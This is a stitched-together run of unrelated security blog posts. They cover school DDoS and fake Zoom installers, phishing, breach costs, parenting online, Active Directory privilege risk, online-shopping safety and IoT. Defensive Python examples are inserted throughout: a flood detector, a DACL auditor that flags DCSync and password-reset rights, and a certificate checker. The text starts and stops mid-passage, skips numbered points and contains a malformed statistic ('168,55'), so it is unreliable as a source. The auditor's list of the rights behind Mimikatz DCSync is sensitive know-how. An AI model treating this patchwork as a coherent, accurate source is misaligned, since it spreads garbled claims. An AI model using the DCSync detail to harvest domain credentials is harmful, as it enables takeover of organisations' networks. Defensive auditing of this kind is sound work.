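    add("203.0.113.1", base + 70)                # a legitimate user caught in the next burst
    for k in range(300):                         # single source: 300 hits in one window
        add("192.0.2.99", base + 70 + k % 10)
    return lines


if __name__ == "__main__":
    for alert in detect_floods(build_sample_log()):
        print(alert)
```

The median baseline keeps a sustained flood from raising its own threshold, which a simple moving average would do. Run it over the day's logs on the learning platform's front end and you will see both the burst windows and how many distinct sources were involved, which is what your upstream provider will ask for.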
Adware and malware
The most common threats that the education sector faces are downloaders, adware and Trojan horses.
This threat is almost exclusively related to the widespread implementation of Zoom. The video conferencing app saw a surge in popularity at the start of lockdown, and cyber criminals responded by creating bogus application installers.
Students and teachers have repeatedly been fooled into installing a bogus version of Zoom, unleashing malicious software onto their systems.
Kaspersky reports that, of the 168,55 instances of bogus application installations that it detected between January and June, 99.5% were associated with fake Zoom apps.
How should schools respond?
Despite schools and universities worldwide reopening their doors to students, digital learning continues to be an essential part of the way they operate – and these systems must be more resilient to attacks.
But although many organisations in the education sector know that they should be doing more, they might not know where to begin. That’s where our Cyber Security as a Service can help.
With this annual subscription service, our experts are on hand to advise you on the best way to protect your organisation.
Even if most of us think we would be able to spot a phishing scam when we receive one, it only takes a momentary lapse in judgement for us to fall victim.
The panic people experience when they receive a message claiming, for example, that there has been suspicious activity on their account will in many cases cause them to overlook signs that the message is malicious.
But by that point it’s too late, with the victim already clicking links, opening attachments and handing over their username and password.
The good news is that this is a weakness organisations and individuals have the power to address. All they have to do is learn about the way phishing works and the clues to look out for.
The result? IT departments are not at all confident in their users’ ability to recognise incoming threats, or in their organisation’s ability to stop phishing campaigns and related attacks.
2. Organisations aren’t doing enough
Staff awareness training isn’t the only step that organisations can take to better protect themselves from phishing scams.
The report highlights three key areas of weakness:
Insufficient backup processes
In the event of a ransomware attack, most organisations have insufficient backup processes. This leaves them unable to quickly restore content on servers, user workstations and other endpoints to a healthy state.
Lack of user testing
Most organisations do not have adequate procedures in place to test their users, leaving them unable to determine which staff members are the most susceptible to an attack.
Conducting a simulated phishing attack can help you establish whether your employees are vulnerable to phishing emails, enabling you to take immediate remedial action to improve your cyber security posture.
BYOD security risks
Many organisations lack a BYOD (bring your own device) policy, meaning that, should a cyber criminal compromise an employee’s personal device, they can access the sensitive data on that device and use it as a foothold to move across the network.
3. Criminal organisations are well funded
The massive success that cyber criminals have had in recent years means they have plenty of funds to invest in scams.
As such, they can invest in technical resources to make their scams run more efficiently – whether that’s the number of scams they can send, the authenticity of their bogus messages or the complexity of their campaigns.
It’s also enabled cyber criminals to branch out into new attack vectors. For example, there has been a significant increase in social media use in recent years.
In response, cyber criminals have changed tactics, looking to extort organisations directly through ransomware attacks.
These types of attack are no more complicated for a cyber criminal to pull off, but the rewards can be much greater.
Although experts warn organisations not to pay ransoms, it’s certainly tempting to wire transfer a lump sum in the hopes that you’ll get your systems back online rather than face the headaches that come with incident response.
5. Phishing tools are low-cost and widespread
There are an increasing number of tools that are designed to help amateurs with little IT knowledge get into the cyber crime industry.
The availability of phishing kits and the rise of ransomware-as-a-service has resulted in an explosion of ransomware and other exploits coming from an ever growing network of amateur cyber criminals.
6. Malware is becoming more sophisticated
Over time, phishing and various types of malware have become more sophisticated.
The problems of phishing, spear-phishing, CEO fraud, business email compromise and ransomware are simply going to get worse without appropriate solutions and processes to defend against them.
Protect your organisation against phishing
Educated and informed employees are your first line of defence. Empower them to make better security decisions with our complete staff awareness e-learning suite.
A cost-effective way of managing all your staff awareness training in one place, the complete suite contains eight e-learning courses to help you transform your employees from threats to assets.
A version of this blog was originally published on 27 March 2017.
That represents a slight decrease on 2019, which Ponemon’s researchers credit to organisations doing a better job strengthening their cyber defences and incident response capabilities.
The report also notes that 52% of data breaches are caused by cyber attacks, and that malware is the costliest form of attack, with organisations spending $4.52 million (about £3.4 million) on average responding to such incidents.
What activities cost organisations money following a data breach?
The report outlines four activities that cost organisations money as they respond to data breaches:
Detection and escalation
These are activities that enable organisations to identify when a breach has occurred.
It covers processes such as forensic and investigative activities, assessment and audit services, crisis management and communications to executives and boards.
Lost business
These are activities that attempt to minimise the loss of customers, business disruption and revenue losses.
It can include disruption caused by system downtime, the costs associated with customer churn and reputational loss.
Notification
These are activities related to the way organisations notify data subjects, regulators and third parties of the data breach.
For example, organisations will typically email or telephone those affected, assess whether the incident needs to be reported to their regulator (and contact them where relevant) and consult with outside experts.
Post-breach response
These are the costs associated with recompensing affected data subjects, and the legal ramifications of the incident.
It includes credit monitoring services for victims, legal expenses, product discounts and regulatory fines.
Mitigating the cost of an attack
The report also highlighted the relationship between the cost of a data breach and the time it takes organisations to contain it. The researchers found that organisations take 280 days on average to detect and respond to an incident. However, those that can complete this process within 200 days save about $1 million (about £750,000).
The best way to shorten that window, according to Ponemon Institute, is to implement automated tools that help detect breaches and suspicious behaviour.
Organisations that used artificial intelligence and analytics had the most success mitigating the costs of data breaches, spending $2.45 million (about £1.84 million) on their recovery process.
By contrast, organisations that didn’t implement such measures spent more than twice that, with an average cost of $6.03 million (about £4.5 million).
This is a lesson that organisations are gradually taking on board. The report found that the proportion of organisations that have implemented measures such as artificial intelligence platforms and automated tools has increased from 15% to 21% in the past two years.
Unfortunately, many organisations don’t know where to begin when implementing and testing defences. That’s where our Cyber Security as a Service can help.
One truth of parenting is this: we do a lot of learning on the job. And that often goes double when it comes to parenting and the internet.
That’s understandable. Whereas we can often look to our own families and how we were raised for parenting guidance, today’s always-on mobile internet, with tablets and smartphones almost always within arm’s reach, wasn’t part of our experience growing up. This is plenty new for nearly all of us. We’re learning on the job as it were, which is one of the many reasons why we reached out to parents around the globe to find out what their concerns and challenges are—particularly around family safety and security in this new mobile world of ours.
Just as we want to know our children are safe as they walk to school or play with friends, we want them to be just as safe when they’re online, particularly when we’re not around to look over their shoulder. Yet where we likely have good answers for keeping our kids safe around the house and the neighborhood, answers about internet safety are sometimes harder to come by.
Recently, we conducted a survey of 600 families and professionals in the U.S. to better understand what matters to them—in terms of security and the lives they want to lead online. The following article reflects what they shared with us, and allows us to share it with you in turn, with the aim of helping you and your family stay safer and more secure.
What concerns and questions do parents have about the internet?
The short answer is that parents are looking for guidance and support. They’re focused on the safety of their children, and they want advice on how to parent when it comes to online privacy, safety, and screen time. Within that, they brought up several specific concerns:
Help my kids not feel anxious about growing up in an online world.
There’s plenty wrapped up in this statement. For one, it refers to the potential anxiety that revolves around social networks and the pressures that can come with using social media—how to act, what’s okay to post and what’s not, friending, following, unfriending, unfollowing, and so on—not to mention the notion of FOMO, or “fear of missing out,” and anxiety that arises from feelings of not being included in someone else’s fun.
Keep my kids safe from bullying, or bullying others.
Feel like I can leave my child alone with a device without encountering inappropriate content.
If we think of the internet as a city, it’s the biggest one there is. For all its libraries, playgrounds, movie theatres, and shopping centers, there are dark alleys and derelict lots as well. Not to mention places that are simply age appropriate for some and not for others. Just as we give our children freer rein to explore their world on their own as they get older, the same holds true for the internet. There are some things we don’t want them to see and do.
Balance the amount of screen time my children get each day.
Screen time is a mix of many things—from schoolwork and videos to games and social media. It has its benefits and its drawbacks, depending on what children are doing and how often they’re doing it. The issue often comes down to what is “too much” screen time, particularly as it relates to the bigger picture of physical activity, face-to-face time with the family, hanging out with friends, and getting a proper bedtime without the dim light of a screen throwing off their sleep rhythms.
Where can parents get started?
Beyond our job of providing online security for devices, our focus at McAfee is on protecting people. Ultimately, that’s the job we aim to do—to help you and your family be safer. Beyond creating software for staying safe, we also put together blogs and resources that help people get sharp on the security topics that matter to them. For parents, check out this page which puts forward some good guidance and advice that can help. Check it out, and we hope that you’ll find even more ways you can keep you and your family safe.
On Monday, the RSA Conference 2020 will begin, where almost a thousand cyber security companies will showcase their greatest cyber security solutions to thousands of attendees, and where supposedly "The World Talks Security!"
If that's the case, let's talk security. I'd like to ask the entire RSA Conference just 1 simple cyber security question -
Question: Do the companies whose CISOs and cyber security personnel are attending the RSA Conference '20 have any idea exactly who has what privileged access in their foundational Active Directory deployments today?
If they don't, then perhaps instead of making the time to attend cyber security conferences, they should first focus on making this paramount determination, because without it, not ONE thing, let alone their entire organization, can be adequately secured.
If this one simple question posed above isn't clear, here are 5 simple specific cyber security 101 questions to help gain clarity:
Does our organization know exactly -
Q 1. Who can run Mimikatz DCSync against our Active Directory to instantly compromise everyone's credentials?
Q 2. Who can change the Domain Admins group's membership to instantly gain privileged access company wide?
Q 3. Who can reset the passwords of, or disable the smart card requirement on, all Domain Admin equivalent privileged accounts?
Q 4. Who can link a malicious GPO to an(y) OU in Active Directory to instantly unleash ransomware system-wide?
Q 5. Who can change or control who has what privileged access in our Active Directory?
If an organization does not have exact answers to these 5 simple questions today, it has absolutely no idea as to exactly who has what privileged access in its foundational Active Directory, and thus, it has absolutely no control over cyber security.
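The five questions above are questions about the DACLs on a handful of objects: the domain root (the replication rights behind DCSync), the Domain Admins group and other privileged principals (membership changes and password resets), and the organizational units that GPOs link to. The following Python script is an added example, not code from the original post or from any product it mentions: it parses the SDDL string of an object's security descriptor and reports allow ACEs that grant control-equivalent rights (GenericAll, WriteDacl, WriteOwner, unrestricted WriteProperty), the three replication extended rights that make up DCSync, User-Force-Change-Password on a privileged account, and any non-read right held by a broad principal such as Everyone or Authenticated Users. The replication and password-reset GUIDs are the fixed values from the Extended-Rights container; the two security descriptors, the unresolved SIDs and the list of principals treated as expected administrators are constructed assumptions.

```python
import re
from dataclasses import dataclass

# Two-letter SDDL access-right codes used on directory objects.
RIGHTS = {
    "GA": "GENERIC_ALL", "GR": "GENERIC_READ", "GW": "GENERIC_WRITE", "GX": "GENERIC_EXECUTE",
    "RC": "READ_CONTROL", "SD": "DELETE", "WD": "WRITE_DAC", "WO": "WRITE_OWNER",
    "RP": "READ_PROP", "WP": "WRITE_PROP", "CC": "CREATE_CHILD", "DC": "DELETE_CHILD",
    "LC": "LIST_CHILDREN", "SW": "SELF_WRITE", "LO": "LIST_OBJECT", "DT": "DELETE_TREE",
    "CR": "CONTROL_ACCESS",
}
# The same rights as access-mask bits, for ACEs written with a hex mask instead of codes.
RIGHT_BITS = {
    0x10000000: "GA", 0x80000000: "GR", 0x40000000: "GW", 0x20000000: "GX",
    0x20000: "RC", 0x10000: "SD", 0x40000: "WD", 0x80000: "WO",
    0x10: "RP", 0x20: "WP", 0x1: "CC", 0x2: "DC", 0x4: "LC", 0x8: "SW",
    0x80: "LO", 0x40: "DT", 0x100: "CR",
}
# Well-known SID strings as SDDL writes them (subset).
TRUSTEES = {
    "WD": "Everyone", "AU": "Authenticated Users", "AN": "Anonymous", "DU": "Domain Users",
    "BU": "BUILTIN\\Users", "BA": "BUILTIN\\Administrators", "DA": "Domain Admins",
    "EA": "Enterprise Admins", "ED": "Enterprise Domain Controllers", "SY": "SYSTEM",
}
BROAD = {"WD", "AU", "AN", "DU", "BU"}               # principals that cover (almost) everybody
EXPECTED_ADMINS = {"DA", "EA", "BA", "SY", "ED"}     # assumption: principals you already know hold control
READ_ONLY = {"RC", "RP", "LC", "LO", "GR", "GX"}

# Extended-right GUIDs; these are the same in every forest.
DCSYNC_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
FORCE_PASSWORD_RESET = "00299570-246d-11d0-a768-00aa006e0529"   # User-Force-Change-Password


@dataclass
class Ace:
    ace_type: str      # A = allow, D = deny, OA = object-specific allow, ...
    rights: set
    object_guid: str   # empty string = the right applies to the whole object
    trustee: str       # SID alias or full S-1-5-... string


def parse_rights(text):
    """Turn the rights field of an ACE into a set of two-letter codes."""
    if text.lower().startswith("0x"):
        mask = int(text, 16)
        return {code for bit, code in RIGHT_BITS.items() if mask & bit}
    return {text[i:i + 2] for i in range(0, len(text), 2)}


def parse_dacl(sddl):
    """Extract the ACEs of the DACL (the D: section) from an SDDL string."""
    match = re.search(r"D:[A-Z]*((?:\([^)]*\))+)", sddl)
    if not match:
        return []
    aces = []
    for body in re.findall(r"\(([^)]*)\)", match.group(1)):
        parts = body.split(";")
        if len(parts) < 6:
            continue
        aces.append(Ace(parts[0], parse_rights(parts[2]), parts[3].lower(), parts[5]))
    return aces


def assess(label, sddl, domain_root=False, privileged_account=False):
    """Return (severity, trustee, reason) findings for allow ACEs held by unexpected principals."""
    findings = []
    for ace in parse_dacl(sddl):
        if ace.ace_type not in ("A", "OA") or ace.trustee in EXPECTED_ADMINS:
            continue
        who = TRUSTEES.get(ace.trustee, ace.trustee)
        r = ace.rights
        control = r & {"GA", "WD", "WO"}
        if control:
            names = "/".join(sorted(RIGHTS[c] for c in control))
            findings.append(("critical", who, f"{label}: {names} (can rewrite the DACL and grant itself anything)"))
        if "WP" in r and not ace.object_guid:
            findings.append(("critical", who, f"{label}: WRITE_PROP on every attribute (group membership included)"))
        if "CR" in r:
            if domain_root and ace.object_guid in DCSYNC_RIGHTS:
                findings.append(("critical", who, f"{label}: {DCSYNC_RIGHTS[ace.object_guid]} (DCSync)"))
            elif not ace.object_guid:
                findings.append(("critical", who, f"{label}: all extended rights" + (" (DCSync included)" if domain_root else "")))
            elif privileged_account and ace.object_guid == FORCE_PASSWORD_RESET:
                findings.append(("critical", who, f"{label}: User-Force-Change-Password"))
        if ace.trustee in BROAD and r - READ_ONLY:
            findings.append(("high", who, f"{label}: broad principal holds non-read rights {sorted(r)}"))
    return findings


# Constructed security descriptors (not from a real domain); the -1104 and -1150 SIDs are placeholders.
DOMAIN_ROOT = (
    "O:DAG:DAD:PAI(A;;RPWPCRCCDCLCLORCWOWDSDDTSW;;;DA)(A;;RPLCLORC;;;AU)"
    "(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)"
    "(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-1004336348-1177238915-682003330-1104)"
    "(A;;WD;;;WD)"   # WD as a right is WRITE_DAC; WD as a trustee is Everyone
)
PRIVILEGED_USER = (
    "O:DAG:DAD:AI(A;;RPLCLORC;;;AU)"
    "(OA;;CR;00299570-246d-11d0-a768-00aa006e0529;;S-1-5-21-1004336348-1177238915-682003330-1150)"
)

if __name__ == "__main__":
    for sev, who, why in assess("DC=corp,DC=example", DOMAIN_ROOT, domain_root=True):
        print(sev.upper(), who, why)
    for sev, who, why in assess("CN=svc-backup,OU=Tier0,DC=corp,DC=example", PRIVILEGED_USER, privileged_account=True):
        print(sev.upper(), who, why)
```

On a domain-joined host with the ActiveDirectory PowerShell module loaded, (Get-Acl -Path "AD:\DC=corp,DC=example").Sddl returns the input this script expects. Note the ACE (A;;WD;;;WD) in the sample: in SDDL the token WD is both the access-right code for WRITE_DAC and the well-known SID string for Everyone, so that one ACE lets anyone rewrite the DACL. Note also the limit of what this shows: it lists who is directly granted a right, which is not the same as the effective permissions the post is asking for. Group nesting, inheritance from parent containers and AdminSDHolder, deny ACEs and object ownership all change the answer, so a direct-ACE listing is where the investigation starts, not where it ends.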
This is Paramount
If you don't think that having exact answers to these questions is paramount, then you don't know a thing about cyber security.
Just ask CrowdStrike, the world famous and globally trusted $10 Billion cyber security company, which puts it this way: "A secure Active Directory environment can mitigate most attacks."
Zero out of 1000
There are almost 1000 cyber security companies exhibiting at the RSA Conference 2020, but guess how many of those 1000 companies could help you accurately determine the answers to 5 simple questions asked above? The answer is 0.
Not Microsoft, not EMC, not CrowdStrike, not FireEye, not Cisco, not IBM, not Symantec, not McAfee, not Palantir, not Tanium, not CyberArk, not Centrify, not Quest, not ZScaler, not BeyondTrust, not Thycotic, not Varonis, not Netwrix, not even HP, in fact no company exhibiting at RSA Conference 2020 has any solution that could help accurately answer these simple questions.
That's right - not a single cyber security company in the world (barring one), let alone the entirety of all cyber security companies exhibiting at or sponsoring the RSA Conference 2020 can help organizations accurately answer these simple questions.
The key to being able to answer the leading question above, as well as the five simple cyber security questions posed above lies in having just 1 simple, fundamental cyber security capability - Active Directory Effective Permissions.
There's only 1 company on planet Earth that possesses this key, and it's not going to be at the RSA Conference 2020 - this one.
Today, yet again, I'd like to share with you a simple Trillion $ question, one that I had originally asked more than 10 years ago, and recently asked again just about two years ago. Today it continues to be exponentially more relevant to the whole world.
In fact, it is more relevant today than ever given the paramount role that cyber security plays in business and national security.
So without further ado, here it is - Who needs WMDs (Weapons of Mass Destruction) Today?
Ans: Only those who don't know that we live in a digital world, one wherein virtually everything runs on (networked) computers.
Why would an entity bother trying to acquire or use a WMD (or for that matter even a conventional weapon) when (if you're smart) you could metaphorically stop the motor of entire organizations (or nations) with just a few lines of code designed to exploit arcane but highly potent misconfigured security settings (ACLs) in the underlying systems on which governments, militaries and thousands of business organizations of the world operate?
Today, all you need is two WDs in the same (pl)ACE and its Game Over.
Puzzled? Allow me to give you a HINT:
Here’s a simple question: What does the following non-default string represent and why should it be a great cause of concern?
Today, this one little question and the technicality I have shared above directly impacts the cyber security of the entire world.
If you read my words very carefully, as you always should, then you'll find that it shouldn't take an astute cyber security professional more than a minute to figure it out, given that I’ve actually already provided the answer above.
Today, the CISO of every organization in the world, whether it be a government, a military or a billion dollar company (of which there are dime a dozen, and in fact thousands worldwide) or a trillion dollar company MUST know the answer to this question.
They must know the answer because it directly impacts and threatens the foundational cyber security of their organizations.
If they don't, (in my opinion) they likely shouldn't be the organization's CISO because what I have shared above could possibly be the single biggest threat to 85% of organizations worldwide, and it could be used to completely compromise them within minutes (and any organization that would like a demo in their real-world environment may feel free to request one.)
Some of you will have figured it out. For the others, I'll finally shed light on the answer soon.
PS: If you need to know right away, perhaps you should give your Microsoft contact a call and ask them. If they too need some help (they likely will ;-)), tell them it has to do with a certain security descriptor in Active Directory. (There, now that's a HINT the size of a domain, and it could get an intruder who's been able to breach an organization's network perimeter to root in seconds.)
PS2: If this intrigues you, and you wish to learn more, you may want to read this - Hello World :-)
Today is January 06, 2020, and as promised, here I am getting back to sharing perspectives on cyber security.
Cyber Security 101
Perhaps a good topic to kick off the year is by seeking to ask and answer a simple yet vital question - What is Active Directory?
You see, while this question may seem simple to some (and it is), it's one of the most important questions to answer adequately, because in an adequate answer to this most simple question lies the key to organizational cyber security worldwide.
The simple reason for this is that if you were to ask most CISOs or IT professionals, they'll likely tell you that Active Directory is the "phone book" of an organization's IT infrastructure. While it's true that at its simplest it is a directory of all organizational accounts and computers, it is this shallow view that leads organizations to greatly diminish the real value of Active Directory, to the point of sheer irresponsible cyber negligence, because "Who really cares about just a phone book?"
In fact, for two decades now, this has been the predominant view held by most CISOs and IT personnel worldwide, and sadly the negligence resulting from such a simplistic view of Active Directory is likely the reason that the Active Directory deployments of most organizations remain substantially insecure and vastly vulnerable to compromise today.
Again, after all, who cares about a phone book?!
Active Directory - The Very Foundation of Organizational Cyber Security Worldwide
If, as they say, "A Picture is Worth a Thousand Words", perhaps I should paint you a very simple Trillion $ picture -
An organization's Active Directory deployment is its single most valuable IT and corporate asset, worthy of the highest protection at all times, because it is the very foundation of an organization's cyber security.
The entirety of an organization's very building blocks of cyber security i.e. all the organizational user accounts and passwords used to authenticate their people, all the security groups used to aggregate and authorize access to all their IT resources, all their privileged user accounts, all the accounts of all their computers, including all laptops, desktops and servers are all stored, managed and secured in (i.e. inside) the organization's foundational Active Directory, and all actions on them audited in it.
In other words, should an organization's foundational Active Directory, or a single Active Directory privileged user account, be compromised, the entirety of the organization could be exposed to the risk of complete, swift and colossal compromise.
Active Directory Security Must Be Organizational Cyber Security Priority #1
Today, ensuring the highest protection of an organization's foundational Active Directory deployment must undoubtedly be the #1 priority of every organization that cares about cyber security, protecting shareholder value and business continuity.
For anyone to whom this may still not be clear, I'll spell it out - just about everything in organizational Cyber Security, whether it be Identity and Access Management, Privileged Access Management, Network Security, Endpoint Security, Data Security, Intrusion Detection, Cloud Security, Zero Trust etc. ultimately relies and depends on Active Directory (and its security.)
In essence, today every organization in the world is only as secure as is its foundational Active Directory deployment, and from the CEO to the CISO to an organization's shareholders, employees and customers, everyone should know this cardinal fact.
I trust this finds you all doing well. It has been a few months since I last blogged - pardon the absence. I had to focus my energies on helping the world get some perspective, getting 007G ready for launch, and dealing with a certain nuisance.
Having successfully accomplished all three objectives, it is TIME to help defend organizations worldwide from the SPECTRE of potentially colossal compromise, which is a real cyber security risk that looms over 85% of organizations worldwide.
When you know as much as I do, care as much as I do, and possess as much capability as I do, you not only shoulder a great responsibility, you almost have an obligation to educate the whole world about cyber security risks that threaten their security.
So, even though I barely have any time to do this, in the interest of foundational cyber security worldwide, I'm going to start sharing a few valuable perspectives again, and do so on this blog, that blog and the official PD blog (see below).
Stay tuned for some valuable cyber security insights right here from January 06, 2020 and let me take your leave with a befitting (and one of my favorite) song(s) -
Best wishes, Sanjay.
PS: Just a month ago, the $ Billion Czech cyber security company Avast was substantially compromised, and guess what the perpetrators used to compromise them? They used the EXACT means I had clearly warned about TWO years ago, right here.
Everything we do on a daily basis has some form of “trust” baked into it. Where you live, what kind of car you drive, where you send your children to school, who you consider good friends, what businesses you purchase from, etc. Trust instills a level of confidence that your risk is minimized and acceptable to you. Why should this philosophy be any different when the entity you need to trust is on the other end of an Internet address? In fact, because you are connecting to an entity that you cannot see or validate, a higher level of scrutiny is required before they earn your trust. What Uniform Resource Locator (URL) are you really connecting to? Is it really your banking website, or the new online shopping website that you are trying for the first time? How can you tell?
It’s a jungle out there. So we’ve put together five ways you can stay safe while you shop online:
Shop at sites you trust. Are you looking at a nationally or globally recognized brand? Do you have detailed insight into what the site looks like? Have you established an account on this site, and is there a history you can track of when you visited and what you bought? Have you bookmarked the valid URL for the site in your browser? Mistyping a URL for any site you routinely visit can lead you to a rogue website.
Use secure networks to connect. Just as important as paying attention to what you connect to is to be wary of where you connect from. Your home Wi-Fi network that you trust—okay. An open Wi-Fi at an airport, cyber café, or public kiosk—not okay. If you can’t trust the network, do not enter identifying information or your payment card information. Just ask our cybersecurity services experts to demonstrate how easy it is to compromise an open Wi-Fi network, and you’ll see why we recommend against public Wi-Fi for sensitive transactions.
Perform basic checks in your browser. Today’s browsers are much better at establishing encrypted connections than they were a few years ago. They use encrypted communication by leveraging a specific protocol, hypertext transfer protocol secure (HTTPS). This means that the site presents a certificate that your browser verifies (that a trusted authority issued it, that it has not expired and that it was issued for the domain you are visiting) before the encrypted channel is established. (Just so you know, yes, certificate validation can be subverted, but that is a problem for another day.) How do you check for this certificate? Look for the padlock in your browser’s address bar, and click it to see which organization the certificate was issued to.
Create strong passwords for your shopping sites. This issue is covered in another blog post, but use longer passwords (at least 10–12 characters) and keep them in a safe place, such as a password manager, that cannot be accessed by an unauthorized person. If a second factor is offered, use it. Many sites will send a code to your smartphone to type into the login screen to verify you are who you say you are.
Don’t give out information about yourself that seems unreasonable. If you are being asked for your social security number, think long and hard, and then longer and harder, about why that information should be required. And then don’t do it until you ask a trusted source about why that would be necessary. Be wary of anything you see when you are on a website that does not look familiar or normal.
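What the browser actually checks before it shows the padlock can be made concrete. The following Python function is an added example, not from the original post: it takes a certificate in the dictionary shape returned by ssl.SSLSocket.getpeercert() and reports whether it is within its validity period and whether the host name is covered by a DNS subjectAltName entry, with the wildcard rule (one '*' as the entire leftmost label, standing for exactly one label) implemented by hand so it is visible. The sample certificate, its dates and the host names are constructed for the example.

```python
import ssl
from datetime import datetime, timezone


def hostname_matches(pattern, hostname):
    """RFC 6125-style name matching: case-insensitive, and a wildcard is only honoured when it is
    the entire leftmost label and stands for exactly one label (never the public suffix)."""
    pattern, hostname = pattern.lower().rstrip("."), hostname.lower().rstrip(".")
    if "*" not in pattern:
        return pattern == hostname
    p_labels, h_labels = pattern.split("."), hostname.split(".")
    if p_labels[0] != "*" or len(p_labels) < 3 or len(p_labels) != len(h_labels):
        return False
    return p_labels[1:] == h_labels[1:]


def check_certificate(cert, hostname, now=None):
    """Return a list of problems; an empty list means the certificate covers hostname at time now.
    cert has the dict shape returned by ssl.SSLSocket.getpeercert()."""
    now = now or datetime.now(timezone.utc)
    problems = []
    not_before = ssl.cert_time_to_seconds(cert["notBefore"])
    not_after = ssl.cert_time_to_seconds(cert["notAfter"])
    if now.timestamp() < not_before:
        problems.append("not yet valid")
    if now.timestamp() > not_after:
        problems.append("expired")
    names = [value for kind, value in cert.get("subjectAltName", ()) if kind == "DNS"]
    if not names:
        problems.append("no DNS subjectAltName (browsers no longer fall back to the CN)")
    elif not any(hostname_matches(name, hostname) for name in names):
        problems.append(f"{hostname} is not covered by SAN {names}")
    return problems


# Constructed certificate fields (example values, not a real site's certificate).
SAMPLE_CERT = {
    "subject": ((("commonName", "shop.example"),),),
    "issuer": ((("organizationName", "Example CA"),),),
    "subjectAltName": (("DNS", "shop.example"), ("DNS", "*.shop.example")),
    "notBefore": "Jan 10 00:00:00 2020 GMT",
    "notAfter": "Dec 31 23:59:59 2020 GMT",
}

if __name__ == "__main__":
    when = datetime(2020, 6, 1, tzinfo=timezone.utc)
    for host in ("shop.example", "www.shop.example", "a.b.shop.example", "shop.example.evil"):
        print(host, check_certificate(SAMPLE_CERT, host, when) or "ok")
    print("in 2021:", check_certificate(SAMPLE_CERT, "shop.example", datetime(2021, 6, 1, tzinfo=timezone.utc)))
```

In practice ssl.create_default_context() performs these checks, plus the chain-of-trust verification back to a root CA, for you, and a live certificate can be pulled with create_default_context().wrap_socket(socket.create_connection((host, 443)), server_hostname=host).getpeercert(). The point of spelling the checks out is to see what "the padlock is there" actually means: the name and dates match and a trusted CA signed the certificate. It says nothing about whether the operator of shop.example.evil is honest.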
We all use the Internet to shop. It is super convenient, and the return on investment is awesome. Having that new cool thing purchased in 10 minutes and delivered directly to your door—wow! Can you ever really be 100% sure that the Internet site you are visiting is legitimate, and that you are not going to inadvertently give away sensitive and/or financial information that is actually going directly into a hacker’s data collection file? Unfortunately, no. A lot of today’s scammers are very sophisticated. But as we discussed up front, this is a trust- and risk-based decision, and if you are aware that you could be compromised at any time on the Internet and are keeping your eyes open for things that just don’t look right or familiar, you have a higher probability of a safe online shopping experience.
Visit and use sites you know and trust
Keep the correct URLs in your bookmarks (don’t risk mistyping a URL).
Check the certificate to ensure your connection to the site is secured by a legitimate and active certificate.
Look for anything that is not familiar to your known experience with the site.
If you can, do not save credit card or payment card information on the site. (If you do, you need to be aware that if that site is breached, your payment data is compromised.)
Use strong passwords for your shopping site accounts. And use a different password for every site. (No one ring to rule them all!)
If a site offers a second factor to authenticate you, use it.
Check all your payment card statements regularly to look for rogue purchases.
Subscribe to an identity theft protection service if you can. These services will alert you if your identity has been compromised.
start this conversation out with the definition of device. The list of what
constitutes one is growing. For now, let’s say that you have a home computer
(desktop, laptop, or both), work computer (desktop, laptop, or both), home
tablet, work tablet, personal smartphone, and work smartphone. This is a pretty
extensive list of devices that an adversary could use to attack you professionally
and personally. But what about your Amazon Alexa or gadgets, smart toys, and
smart clocks? What about Google Assistant or Microsoft Cortana? Do you also
have a SmartTV? What about NEST, Wink, WeMo, SensorPush, Neurio, ecobee4,
Philips Hue, Smart Lock, GarageMate? Hoo boy! The list of connected devices goes
on and on.
of these devices safe to use? Well, the simple answer is no—unless you
specifically paid attention to its security. Also, for your smart devices that
work via voice control, do you know who might be listening on the other end? To
make things worse, many of these devices are also used in the corporate world,
because they are easy to deploy, and are very affordable.
about applications? Did the developer that created the application you are
using ensure they used good secure coding techniques? Or is there a likelihood
they introduced a flaw in their code? Are the servers for the application you
are running in the cloud secure? Is the data you are storing on these cloud
systems protected from unauthorized access?
really good questions we rarely ask ourselves—at least before we use the latest
and coolest applications available. We all make risk-based decisions every day,
but do we ever ensure we have all the data before we make that risk-based
What Can You Do?
by doing whatever homework and research you can. Make sure you understand the
social engineering methods that the malicious actors are currently using. Unsolicited
phone calls from a government agency (like the IRS), a public utility, or even
Microsoft or Apple are not legitimate. No you don’t owe back taxes, no your
computer has not been hacked, no you don’t need to give out sensitive personal
information to your power company over the phone.
How Can You Choose Safe Applications?
“Is this <name of application> secure?” Never install an application that
you don’t feel you can trust. Using an application is all about risk
management. Make sure you understand the potential risk to device and data
compromise, prior to choosing to use it.
How Can You Better Secure Your Home Network?
Upon installation of any device, immediately change the login and password. These
are often stored in the configuration files that come with the product, and are
therefore easy to look up.
Change the login and password on your home Wi-Fi router frequently.
Make sure the software for anything that connects is up to date.
Make sure you have a clear sense of where your sensitive data is stored—and how it is
protected. Is it adequately protected—or, better yet, encrypted?
When in doubt, don’t connect an IoT device to the Internet.
Lastly, look at some solutions that can be added to your home Wi-Fi network that provide additional layers of protection and detection against IoT and other advanced attacks. F-Secure Sense Gadget is one such solution, as are the Luma smart Wi-Fi router, Dojo, and CUJO. Dojo, for example, monitors all incoming and outgoing traffic and performs analysis looking for malicious traffic. With known weaknesses in IoT and home networks in general, solutions like the above are a good investment.
Don’t Give Hackers Easy Access
Not long ago, a casino in the Northeast had a fish tank in their lobby. To make management of the fish tank easier, they installed an IoT-enabled thermostatic control to set and monitor water temperature in the tank. The thermostatic control was connected to their internal network, as well as IoT-enabled to allow easy access from anywhere on the Internet. The device was breached from the Internet by malicious actors, and the internal network was penetrated, allowing the hackers to steal information from a high-roller database before devices monitoring the network were able to identify the unauthorized data leaving the network and shut it down. A classic case of what can happen without the right due diligence.
Try and follow this motto. Just because you can, does not mean you should. The latest shiny IT gadget that will make you seem cool, or potentially make some portion of your life easier to manage, should be evaluated thoroughly for security weaknesses, before you turn it on and open it up to the world. Make that good risk-based decision. Not many of us would consider doing this: “Hey Alexa, open up my desktop computer so that all my sensitive data is opened for all the world to see.” Or would we?
This week, the famous RSA Conference 2019 is underway, where supposedly "The World Talks Security" -
If that's the case, let's talk - I'd like to respectfully ask the entire RSA Conference just one simple cyber security question -
